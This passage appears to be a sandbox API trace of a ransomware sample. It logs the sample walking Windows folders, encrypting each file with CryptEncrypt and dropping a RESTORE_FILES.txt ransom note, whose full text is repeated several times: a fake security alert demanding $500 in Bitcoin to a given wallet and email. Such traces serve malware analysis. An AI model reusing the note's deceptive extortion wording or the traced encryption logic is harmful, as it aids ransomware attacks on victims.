dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.012] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.012] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: 
lpFindFileData=0x295ecb0) returned 1 [0066.012] lstrcmpiW (lpString1="pictures.ico", lpString2="Windows") returned -1 [0066.012] lstrcmpiW (lpString1="pictures.ico", lpString2="Program Files") returned -1 [0066.012] lstrcmpiW (lpString1="pictures.ico", lpString2="Program Files (x86)") returned -1 [0066.012] lstrcmpiW (lpString1="pictures.ico", lpString2="$Recycle.bin") returned 1 [0066.012] lstrcmpiW (lpString1="pictures.ico", lpString2="System Volume Information") returned -1 [0066.012] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico") returned 98 [0066.012] StrStrIW (lpFirst="pictures.ico", lpSrch=".protected") returned 0x0 [0066.012] lstrcmpW (lpString1="pictures.ico", lpString2="RESTORE_FILES.txt") returned -1 [0066.012] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.012] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.012] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.012] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.012] lstrcmpiW (lpString1="resource.xml", lpString2="Windows") returned -1 [0066.012] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files") returned 1 [0066.012] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files (x86)") returned 1 [0066.012] 
lstrcmpiW (lpString1="resource.xml", lpString2="$Recycle.bin") returned 1 [0066.012] lstrcmpiW (lpString1="resource.xml", lpString2="System Volume Information") returned -1 [0066.012] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml") returned 98 [0066.012] StrStrIW (lpFirst="resource.xml", lpSrch=".protected") returned 0x0 [0066.012] lstrcmpW (lpString1="resource.xml", lpString2="RESTORE_FILES.txt") returned -1 [0066.012] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.012] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.012] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.013] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.013] lstrcmpiW (lpString1="ringtones.ico", lpString2="Windows") returned -1 [0066.013] lstrcmpiW (lpString1="ringtones.ico", lpString2="Program Files") returned 1 [0066.013] lstrcmpiW (lpString1="ringtones.ico", lpString2="Program Files (x86)") returned 1 [0066.013] lstrcmpiW (lpString1="ringtones.ico", lpString2="$Recycle.bin") returned 1 [0066.013] lstrcmpiW (lpString1="ringtones.ico", lpString2="System Volume Information") returned -1 [0066.013] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico") returned 99 [0066.013] StrStrIW (lpFirst="ringtones.ico", lpSrch=".protected") returned 0x0 [0066.013] lstrcmpW (lpString1="ringtones.ico", lpString2="RESTORE_FILES.txt") returned 1 [0066.013] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.013] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.013] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.013] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.013] lstrcmpiW (lpString1="settings.ico", lpString2="Windows") returned -1 [0066.013] lstrcmpiW (lpString1="settings.ico", lpString2="Program Files") returned 1 [0066.014] lstrcmpiW (lpString1="settings.ico", lpString2="Program Files (x86)") returned 1 [0066.014] lstrcmpiW (lpString1="settings.ico", lpString2="$Recycle.bin") returned 1 [0066.014] lstrcmpiW (lpString1="settings.ico", lpString2="System Volume Information") returned -1 [0066.014] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico") returned 98 [0066.014] StrStrIW (lpFirst="settings.ico", lpSrch=".protected") returned 0x0 [0066.014] lstrcmpW (lpString1="settings.ico", lpString2="RESTORE_FILES.txt") returned 1 
[0066.014] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.014] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.014] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.014] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.014] lstrcmpiW (lpString1="sync.ico", lpString2="Windows") returned -1 [0066.014] lstrcmpiW (lpString1="sync.ico", lpString2="Program Files") returned 1 [0066.014] lstrcmpiW (lpString1="sync.ico", lpString2="Program Files (x86)") returned 1 [0066.014] lstrcmpiW (lpString1="sync.ico", lpString2="$Recycle.bin") returned 1 [0066.014] lstrcmpiW (lpString1="sync.ico", lpString2="System Volume Information") returned -1 [0066.014] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico") returned 94 [0066.014] StrStrIW (lpFirst="sync.ico", lpSrch=".protected") returned 0x0 [0066.014] lstrcmpW (lpString1="sync.ico", lpString2="RESTORE_FILES.txt") returned 1 [0066.014] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.014] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.014] CreateFileW 
(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.014] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.014] lstrcmpiW (lpString1="tasks.xml", lpString2="Windows") returned -1 [0066.014] lstrcmpiW (lpString1="tasks.xml", lpString2="Program Files") returned 1 [0066.014] lstrcmpiW (lpString1="tasks.xml", lpString2="Program Files (x86)") returned 1 [0066.014] lstrcmpiW (lpString1="tasks.xml", lpString2="$Recycle.bin") returned 1 [0066.014] lstrcmpiW (lpString1="tasks.xml", lpString2="System Volume Information") returned 1 [0066.014] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml") returned 95 [0066.014] StrStrIW (lpFirst="tasks.xml", lpSrch=".protected") returned 0x0 [0066.014] lstrcmpW (lpString1="tasks.xml", lpString2="RESTORE_FILES.txt") returned 1 [0066.014] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.014] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.015] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.015] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.015] lstrcmpiW (lpString1="wmp.ico", lpString2="Windows") returned 1 [0066.015] lstrcmpiW (lpString1="wmp.ico", lpString2="Program Files") returned 1 [0066.015] lstrcmpiW (lpString1="wmp.ico", lpString2="Program Files (x86)") returned 1 [0066.015] lstrcmpiW (lpString1="wmp.ico", lpString2="$Recycle.bin") returned 1 [0066.015] lstrcmpiW (lpString1="wmp.ico", lpString2="System Volume Information") returned 1 [0066.015] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico") returned 93 [0066.015] StrStrIW (lpFirst="wmp.ico", lpSrch=".protected") returned 0x0 [0066.015] lstrcmpW (lpString1="wmp.ico", lpString2="RESTORE_FILES.txt") returned 1 [0066.015] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0066.015] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0066.015] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.015] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0066.015] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0066.016] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\RESTORE_FILES.txt") returned 103 [0066.016] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0066.016] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.016] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0066.017] lstrlenA (lpString="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") returned 684 [0066.017] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0066.017] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.017] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0066.017] CloseHandle (hObject=0xd4) returned 1 [0066.017] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0066.017] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="Windows") returned -1 [0066.017] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="Program Files") returned -1 [0066.017] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="Program Files (x86)") returned -1 [0066.017] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="$Recycle.bin") returned 1 [0066.017] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="System Volume Information") returned -1 [0066.017] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned 85 [0066.017] lstrcmpW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2=".") returned 1 [0066.017] lstrcmpW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="..") returned 1 [0066.017] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*") returned 87 [0066.017] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0066.018] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.018] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.018] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.018] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.018] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.018] 
wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\.") returned 87 [0066.018] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.018] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.018] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.018] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.018] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.018] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.018] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.018] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\..") returned 88 [0066.018] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.019] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.019] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.019] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0066.019] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0066.019] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0066.019] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0066.019] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0066.019] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned 91 [0066.019] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0066.019] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0066.019] wnsprintfW (in: 
pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*") returned 93 [0066.019] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x4a9210 [0066.019] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.019] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.019] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.019] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.019] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.019] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\.") returned 93 [0066.019] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.019] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0066.019] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.019] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.019] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.019] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.019] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.019] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\..") returned 94 [0066.019] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.019] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.019] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | 
out: lpFindFileData=0x295ea40) returned 1 [0066.019] lstrcmpiW (lpString1="resource.xml", lpString2="Windows") returned -1 [0066.019] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files") returned 1 [0066.019] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files (x86)") returned 1 [0066.019] lstrcmpiW (lpString1="resource.xml", lpString2="$Recycle.bin") returned 1 [0066.019] lstrcmpiW (lpString1="resource.xml", lpString2="System Volume Information") returned -1 [0066.019] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml") returned 104 [0066.020] StrStrIW (lpFirst="resource.xml", lpSrch=".protected") returned 0x0 [0066.020] lstrcmpW (lpString1="resource.xml", lpString2="RESTORE_FILES.txt") returned -1 [0066.020] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0066.020] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0066.020] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.020] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0066.020] FindClose (in: hFindFile=0x4a9210 | out: hFindFile=0x4a9210) returned 1 [0066.020] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device 
Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\RESTORE_FILES.txt") returned 109 [0066.020] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0066.021] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.021] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0066.022] lstrlenA (lpString="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") returned 684 [0066.022] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0066.022] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.022] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
